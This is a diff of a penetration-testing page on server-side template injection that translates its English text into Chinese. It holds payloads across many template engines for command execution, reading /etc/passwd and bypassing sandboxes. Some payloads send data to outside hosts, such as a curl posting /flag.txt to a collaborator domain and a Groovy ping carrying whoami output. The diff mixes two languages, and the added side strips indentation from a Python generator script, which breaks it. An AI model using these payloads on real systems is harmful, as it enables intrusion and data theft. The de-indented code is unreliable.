-Identifying the template engine involves analyzing error messages or manually testing various language-specific payloads. Common payloads causing errors include `${7/0}`, `{{7/0}}`, and `<%= 7/0 %>`. Observing the server's response to mathematical operations helps pinpoint the specific template engine.
-
-#### Identification by payloads
+#### 通过有效载荷识别
 
 <figure><img src="../../images/image (9).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*35XwCGeYeKYmeaU8rdkSdg.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*35XwCGeYeKYmeaU8rdkSdg.jpeg</a></p></figcaption></figure>
 
-- More info in [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
+- 更多信息请见 [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
 
-## Tools
+## 工具
 
 ### [TInjA](https://github.com/Hackmanit/TInjA)
 
-an efficient SSTI + CSTI scanner which utilizes novel polyglots
-
+一个高效的 SSTI + CSTI 扫描器，利用新颖的多语言组合
 ```bash
 tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
 tinja url -u "http://example.com/" -d "username=Kirlia"  -c "PHPSESSID=ABC123..."
 ```
-
 ### [SSTImap](https://github.com/vladko312/sstimap)
-
 ```bash
 python3 sstimap.py -i -l 5
 python3 sstimap.py -u "http://example.com/" --crawl 5 --forms
 python3 sstimap.py -u "https://example.com/page?name=John" -s
 ```
-
 ### [Tplmap](https://github.com/epinna/tplmap)
-
 ```python
 python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
 python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
 python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
 ```
+### [模板注入表](https://github.com/Hackmanit/template-injection-table)
 
-### [Template Injection Table](https://github.com/Hackmanit/template-injection-table)
+一个包含最有效的模板注入多语言的交互式表格，以及44个最重要的模板引擎的预期响应。
 
-an interactive table containing the most efficient template injection polyglots along with the expected responses of the 44 most important template engines.
+## 漏洞
 
-## Exploits
+### 通用
 
-### Generic
-
-In this **wordlist** you can find **variables defined** in the environments of some of the engines mentioned below:
+在这个**词汇表**中，您可以找到一些下面提到的引擎环境中**定义的变量**：
 
 - [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt)
 - [https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt)
 
 ### Java
 
-**Java - Basic injection**
-
+**Java - 基本注入**
 ```java
 ${7*7}
 ${{7*7}}
@@ -101,31 +90,25 @@ ${class.getResource("").getPath()}
 ${class.getResource("../../../../../index.htm").getContent()}
 // if ${...} doesn't work try #{...}, *{...}, @{...} or ~{...}.
 ```
-
-**Java - Retrieve the system’s environment variables**
-
+**Java - 获取系统的环境变量**
 ```java
 ${T(java.lang.System).getenv()}
 ```
-
-**Java - Retrieve /etc/passwd**
-
+**Java - 检索 /etc/passwd**
 ```java
 ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
 
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
-
 ### FreeMarker (Java)
 
-You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
+您可以在 [https://try.freemarker.apache.org](https://try.freemarker.apache.org) 尝试您的有效载荷
 
 - `{{7*7}} = {{7*7}}`
 - `${7*7} = 49`
 - `#{7*7} = 49 -- (legacy)`
 - `${7*'7'} Nothing`
 - `${foobar}`
-
 ```java
 <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
@@ -133,11 +116,9 @@ ${"freemarker.template.utility.Execute"?new()("id")}
 
 ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
 ```
+**Freemarker - 沙箱绕过**
 
-**Freemarker - Sandbox bypass**
-
-⚠️ only works on Freemarker versions below 2.3.30
-
+⚠️ 仅适用于 2.3.30 版本以下的 Freemarker
 ```java
 <#assign classloader=article.class.protectionDomain.classLoader>
 <#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
@@ -145,14 +126,12 @@ ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI()
 <#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
 ${dwf.newInstance(ec,null)("id")}
 ```
+**更多信息**
 
-**More information**
-
-- In FreeMarker section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+- 在 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) 的 FreeMarker 部分
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker)
 
 ### Velocity (Java)
-
 ```java
 // I think this doesn't work
 #set($str=$class.inspect("java.lang.String").type)
@@ -175,55 +154,48 @@ $str.valueOf($chr.toChars($out.read()))
 $out.read()
 #end
 ```
+**更多信息**
 
-**More information**
-
-- In Velocity section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+- 在 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) 的 Velocity 部分
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity)
 
 ### Thymeleaf
 
-In Thymeleaf, a common test for SSTI vulnerabilities is the expression `${7*7}`, which also applies to this template engine. For potential remote code execution, expressions like the following can be used:
+在 Thymeleaf 中，测试 SSTI 漏洞的常见表达式是 `${7*7}`，这同样适用于此模板引擎。对于潜在的远程代码执行，可以使用以下表达式：
 
 - SpringEL:
 
-  ```java
-  ${T(java.lang.Runtime).getRuntime().exec('calc')}
-  ```
+```java
+${T(java.lang.Runtime).getRuntime().exec('calc')}
+```
 
 - OGNL:
 
-  ```java
-  ${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}
-  ```
+```java
+${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}
+```
 
-Thymeleaf requires these expressions to be placed within specific attributes. However, _expression inlining_ is supported for other template locations, using syntax like `[[...]]` or `[(...)]`. Thus, a simple SSTI test payload might look like `[[${7*7}]]`.
+Thymeleaf 要求这些表达式放置在特定属性中。然而，_表达式内联_ 对于其他模板位置是支持的，使用语法如 `[[...]]` 或 `[(...)]`。因此，一个简单的 SSTI 测试有效负载可能看起来像 `[[${7*7}]]`。
 
-However, the likelihood of this payload working is generally low. Thymeleaf's default configuration doesn't support dynamic template generation; templates must be predefined. Developers would need to implement their own `TemplateResolver` to create templates from strings on-the-fly, which is uncommon.
-
-Thymeleaf also offers _expression preprocessing_, where expressions within double underscores (`__...__`) are preprocessed. This feature can be utilized in the construction of expressions, as demonstrated in Thymeleaf's documentation:
+然而，这个有效负载成功的可能性通常较低。Thymeleaf 的默认配置不支持动态模板生成；模板必须是预定义的。开发人员需要实现自己的 `TemplateResolver` 以动态从字符串创建模板，这并不常见。
 
+Thymeleaf 还提供了 _表达式预处理_，其中双下划线 (`__...__`) 内的表达式会被预处理。这个特性可以在构建表达式时使用，如 Thymeleaf 文档中所示：
 ```java
 #{selection.__${sel.code}__}
 ```
+**Thymeleaf中的漏洞示例**
 
-**Example of Vulnerability in Thymeleaf**
-
-Consider the following code snippet, which could be susceptible to exploitation:
-
+考虑以下代码片段，它可能容易受到利用：
 ```xml
 <a th:href="@{__${path}__}" th:title="${title}">
 <a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
 ```
-
-This indicates that if the template engine processes these inputs improperly, it might lead to remote code execution accessing URLs like:
-
+这表明，如果模板引擎不正确地处理这些输入，可能会导致远程代码执行，访问类似以下的 URL：
 ```
 http://localhost:8082/(7*7)
 http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
 ```
-
-**More information**
+**更多信息**
 
 - [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
 
@@ -232,23 +204,18 @@ el-expression-language.md
 {{#endref}}
 
 ### Spring Framework (Java)
-
 ```java
 *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
 ```
+**绕过过滤器**
 
-**Bypass filters**
-
-Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.
-
-- Read `/etc/passwd`
+可以使用多个变量表达式，如果 `${...}` 不起作用，请尝试 `#{...}`、`*{...}`、`@{...}` 或 `~{...}`。
 
+- 读取 `/etc/passwd`
 ```java
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
-
-- Custom Script for payload generation
-
+- 自定义脚本用于有效载荷生成
 ```python
 #!/usr/bin/python3
 
@@ -265,30 +232,27 @@ end_payload = '.getInputStream())}'
 
 count = 1
 for i in converted:
-    if count == 1:
-        base_payload += f"(T(java.lang.Character).toString({i}).concat"
-        count += 1
-    elif count == len(converted):
-        base_payload += f"(T(java.lang.Character).toString({i})))"
-    else:
-        base_payload += f"(T(java.lang.Character).toString({i})).concat"
-        count += 1
+if count == 1:
+base_payload += f"(T(java.lang.Character).toString({i}).concat"
+count += 1
+elif count == len(converted):
+base_payload += f"(T(java.lang.Character).toString({i})))"
+else:
+base_payload += f"(T(java.lang.Character).toString({i})).concat"
+count += 1
 
 print(base_payload + end_payload)
 ```
-
-**More Information**
+**更多信息**
 
 - [Thymleaf SSTI](https://javamana.com/2021/11/20211121071046977B.html)
 - [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#java---retrieve-etcpasswd)
 
-### Spring View Manipulation (Java)
-
+### Spring 视图操作 (Java)
 ```java
 __${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
 __${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
 ```
-
 - [https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
 
 {{#ref}}
@@ -299,14 +263,11 @@ el-expression-language.md
 
 - `{{ someString.toUPPERCASE() }}`
 
-Old version of Pebble ( < version 3.0.9):
-
+Pebble 的旧版本（< 版本 3.0.9）：
 ```java
 {{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
 ```
-
-New version of Pebble :
-
+新版本的 Pebble：
 ```java
 {% raw %}
 {% set cmd = 'id' %}
@@ -318,31 +279,27 @@ New version of Pebble :
 
 
 {% set bytes = (1).TYPE
-     .forName('java.lang.Runtime')
-     .methods[6]
-     .invoke(null,null)
-     .exec(cmd)
-     .inputStream
-     .readAllBytes() %}
+.forName('java.lang.Runtime')
+.methods[6]
+.invoke(null,null)
+.exec(cmd)
+.inputStream
+.readAllBytes() %}
 {{ (1).TYPE
-     .forName('java.lang.String')
-     .constructors[0]
-     .newInstance(([bytes]).toArray()) }}
+.forName('java.lang.String')
+.constructors[0]
+.newInstance(([bytes]).toArray()) }}
 ```
-
 ### Jinjava (Java)
-
 ```java
 {{'a'.toUpperCase()}} would result in 'A'
 {{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
 ```
+Jinjava 是一个由 Hubspot 开发的开源项目，地址为 [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
 
-Jinjava is an open source project developed by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
-
-**Jinjava - Command execution**
-
-Fixed by [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230)
+**Jinjava - 命令执行**
 
+通过 [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230) 修复
 ```java
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
 
@@ -352,16 +309,15 @@ Fixed by [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpo
 
 {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 ```
-
-**More information**
+**更多信息**
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava)
 
 ### Hubspot - HuBL (Java)
 
-- `{% %}` statement delimiters
-- `{{ }}` expression delimiters
-- `{# #}` comment delimiters
+- `{% %}` 语句分隔符
+- `{{ }}` 表达式分隔符
+- `{# #}` 注释分隔符
 - `{{ request }}` - com.hubspot.content.hubl.context.TemplateContextRequest@23548206
 - `{{'a'.toUpperCase()}}` - "A"
 - `{{'a'.concat('b')}}` - "ab"
@@ -369,8 +325,7 @@ Fixed by [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpo
 - `{{request.getClass()}}` - class com.hubspot.content.hubl.context.TemplateContextRequest
 - `{{request.getClass().getDeclaredMethods()[0]}}` - public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()
 
-Search for "com.hubspot.content.hubl.context.TemplateContextRequest" and discovered the [Jinjava project on Github](https://github.com/HubSpot/jinjava/).
-
+搜索 "com.hubspot.content.hubl.context.TemplateContextRequest" 并发现了 [Jinjava 项目在 Github](https://github.com/HubSpot/jinjava/)。
 ```java
 {{request.isDebug()}}
 //output: False
@@ -411,12 +366,11 @@ Search for "com.hubspot.content.hubl.context.TemplateContextRequest" and discove
 Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
 //Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 ```
-
-**More information**
+**更多信息**
 
 - [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)
 
-### Expression Language - EL (Java)
+### 表达式语言 - EL (Java)
 
 - `${"aaaa"}` - "aaaa"
 - `${99999+1}` - 100000.
@@ -424,13 +378,13 @@ Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstanc
 - `${{7*7}}` - 49
 - `${{request}}, ${{session}}, {{faceContext}}`
 
-Expression Language (EL) is a fundamental feature that facilitates interaction between the presentation layer (like web pages) and the application logic (like managed beans) in JavaEE. It's used extensively across multiple JavaEE technologies to streamline this communication. The key JavaEE technologies utilizing EL include:
+表达式语言 (EL) 是一个基本特性，促进了 JavaEE 中表现层（如网页）与应用逻辑（如托管 bean）之间的交互。它在多个 JavaEE 技术中被广泛使用，以简化这种通信。利用 EL 的关键 JavaEE 技术包括：
 
-- **JavaServer Faces (JSF)**: Employs EL to bind components in JSF pages to the corresponding backend data and actions.
-- **JavaServer Pages (JSP)**: EL is used in JSP for accessing and manipulating data within JSP pages, making it easier to connect page elements to the application data.
-- **Contexts and Dependency Injection for Java EE (CDI)**: EL integrates with CDI to allow seamless interaction between the web layer and managed beans, ensuring a more coherent application structure.
+- **JavaServer Faces (JSF)**：使用 EL 将 JSF 页面中的组件绑定到相应的后端数据和操作。
+- **JavaServer Pages (JSP)**：EL 在 JSP 中用于访问和操作 JSP 页面中的数据，使得连接页面元素与应用数据变得更加容易。
+- **Java EE 的上下文和依赖注入 (CDI)**：EL 与 CDI 集成，允许 web 层与托管 bean 之间的无缝交互，确保更连贯的应用结构。
 
-Check the following page to learn more about the **exploitation of EL interpreters**:
+查看以下页面以了解更多关于 **EL 解释器的利用**：
 
 {{#ref}}
 el-expression-language.md
@@ -438,24 +392,23 @@ el-expression-language.md
 
 ### Groovy (Java)
 
-The following Security Manager bypasses were taken from this [**writeup**](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/).
-
+以下安全管理器绕过来自于这篇 [**写作**](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/)。
 ```java
 //Basic Payload
 import groovy.*;
 @groovy.transform.ASTTest(value={
-    cmd = "ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "
-    assert java.lang.Runtime.getRuntime().exec(cmd.split(" "))
+cmd = "ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "
+assert java.lang.Runtime.getRuntime().exec(cmd.split(" "))
 })
 def x
 
 //Payload to get output
 import groovy.*;
 @groovy.transform.ASTTest(value={
-    cmd = "whoami";
-    out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
-    cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net";
-    java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
+cmd = "whoami";
+out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
+cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net";
+java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
 })
 def x
 
@@ -464,23 +417,21 @@ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value=
 this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==")))
 this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))
 ```
-
-### Other Java
+### 其他 Java
 
 <figure><img src="../../images/image (7).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*NHgR25-CMICMhPOaIJzqwQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*NHgR25-CMICMhPOaIJzqwQ.jpeg</a></p></figcaption></figure>
 
-- More info in [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
+- 更多信息请访问 [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的事件之一。该大会 **旨在促进技术知识**，是各个学科技术和网络安全专业人士的热烈交流平台。
 
 {% embed url="https://www.rootedcon.com/" %}
 
 ##
 
 ### Smarty (PHP)
-
 ```php
 {$smarty.version}
 {php}echo `id`;{/php} //deprecated in smarty v3
@@ -488,10 +439,9 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
 {system('ls')} // compatible v3
 {system('cat index.php')} // compatible v3
 ```
+**更多信息**
 
-**More information**
-
-- In Smarty section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+- 在 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) 的 Smarty 部分
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty)
 
 ### Twig (PHP)
@@ -501,7 +451,6 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
 - `{{7*'7'}} = 49`
 - `{{1/0}} = Error`
 - `{{foobar}} Nothing`
-
 ```python
 #Get Info
 {{_self}} #(Ref. to current application)
@@ -525,32 +474,28 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
 #Hide warnings and errors for automatic exploitation
 {{["error_reporting", "0"]|sort("ini_set")}}
 ```
-
-**Twig - Template format**
-
+**Twig - 模板格式**
 ```php
 $output = $twig > render (
-  'Dear' . $_GET['custom_greeting'],
-  array("first_name" => $user.first_name)
+'Dear' . $_GET['custom_greeting'],
+array("first_name" => $user.first_name)
 );
 
 $output = $twig > render (
-  "Dear {first_name}",
-  array("first_name" => $user.first_name)
+"Dear {first_name}",
+array("first_name" => $user.first_name)
 );
 ```
+**更多信息**
 
-**More information**
-
-- In Twig and Twig (Sandboxed) section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+- 在 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection) 的 Twig 和 Twig (Sandboxed) 部分
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)
 
 ### Plates (PHP)
 
-Plates is a templating engine native to PHP, drawing inspiration from Twig. However, unlike Twig, which introduces a new syntax, Plates leverages native PHP code in templates, making it intuitive for PHP developers.
+Plates 是一个原生于 PHP 的模板引擎，受到 Twig 的启发。然而，与引入新语法的 Twig 不同，Plates 在模板中利用原生 PHP 代码，使其对 PHP 开发者直观易懂。
 
 Controller:
-
 ```php
 // Create new Plates instance
 $templates = new League\Plates\Engine('/path/to/templates');
@@ -558,81 +503,73 @@ $templates = new League\Plates\Engine('/path/to/templates');
 // Render a template
 echo $templates->render('profile', ['name' => 'Jonathan']);
 ```
-
-Page template:
-
+页面模板：
 ```php
 <?php $this->layout('template', ['title' => 'User Profile']) ?>
 
 <h1>User Profile</h1>
 <p>Hello, <?=$this->e($name)?></p>
 ```
-
-Layout template:
-
+布局模板：
 ```html
 <html>
-  <head>
-    <title><?=$this->e($title)?></title>
-  </head>
-  <body>
-    <?=$this->section('content')?>
-  </body>
+<head>
+<title><?=$this->e($title)?></title>
+</head>
+<body>
+<?=$this->section('content')?>
+</body>
 </html>
 ```
-
-**More information**
+**更多信息**
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates)
 
-### PHPlib and HTML_Template_PHPLIB (PHP)
+### PHPlib 和 HTML_Template_PHPLIB (PHP)
 
-[HTML_Template_PHPLIB](https://github.com/pear/HTML_Template_PHPLIB) is the same as PHPlib but ported to Pear.
+[HTML_Template_PHPLIB](https://github.com/pear/HTML_Template_PHPLIB) 与 PHPlib 相同，但移植到 Pear。
 
 `authors.tpl`
-
 ```html
 <html>
-  <head>
-    <title>{PAGE_TITLE}</title>
-  </head>
-  <body>
-    <table>
-      <caption>
-        Authors
-      </caption>
-      <thead>
-        <tr>
-          <th>Name</th>
-          <th>Email</th>
-        </tr>
-      </thead>
-      <tfoot>
-        <tr>
-          <td colspan="2">{NUM_AUTHORS}</td>
-        </tr>
-      </tfoot>
-      <tbody>
-        <!-- BEGIN authorline -->
-        <tr>
-          <td>{AUTHOR_NAME}</td>
-          <td>{AUTHOR_EMAIL}</td>
-        </tr>
-        <!-- END authorline -->
-      </tbody>
-    </table>
-  </body>
+<head>
+<title>{PAGE_TITLE}</title>
+</head>
+<body>
+<table>
+<caption>
+Authors
+</caption>
+<thead>
+<tr>
+<th>Name</th>
+<th>Email</th>
+</tr>
+</thead>
+<tfoot>
+<tr>
+<td colspan="2">{NUM_AUTHORS}</td>
+</tr>
+</tfoot>
+<tbody>
+<!-- BEGIN authorline -->
+<tr>
+<td>{AUTHOR_NAME}</td>
+<td>{AUTHOR_EMAIL}</td>
+</tr>
+<!-- END authorline -->
+</tbody>
+</table>
+</body>
 </html>
 ```
-
 `authors.php`
-
 ```php
 <?php
 //we want to display this author list
 $authors = array(
-    'Christian Weiske'  => 'cweiske@php.net',
-    'Bjoern Schotte'     => 'schotte@mayflower.de'
+'Christian Weiske'  => 'cweiske@php.net',
+'Bjoern Schotte'     => 'schotte@mayflower.de'
 );
 
 require_once 'HTML/Template/PHPLIB.php';
@@ -649,28 +586,26 @@ $t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));
 
 //display the authors
 foreach ($authors as $name => $email) {
-    $t->setVar('AUTHOR_NAME', $name);
-    $t->setVar('AUTHOR_EMAIL', $email);
-    $t->parse('authorline_ref', 'authorline', true);
+$t->setVar('AUTHOR_NAME', $name);
+$t->setVar('AUTHOR_EMAIL', $email);
+$t->parse('authorline_ref', 'authorline', true);
 }
 
 //finish and echo
 echo $t->finish($t->parse('OUT', 'authors'));
 ?>
 ```
-
-**More information**
+**更多信息**
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html_template_phplib](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html_template_phplib)
 
-### Other PHP
+### 其他 PHP
 
 <figure><img src="../../images/image (6).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*u4h8gWhE8gD5zOtiDQalqw.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*u4h8gWhE8gD5zOtiDQalqw.jpeg</a></p></figcaption></figure>
 
-- More info in [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
+- 更多信息在 [https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
 
 ### Jade (NodeJS)
-
 ```javascript
 - var x = root.process
 - x = x.mainModule.require
@@ -681,97 +616,86 @@ echo $t->finish($t->parse('OUT', 'authors'));
 ```javascript
 #{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
 ```
+**更多信息**
 
-**More information**
-
-- In Jade section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
+- 在 Jade 部分的 [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)
 
 ### patTemplate (PHP)
 
-> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts
-
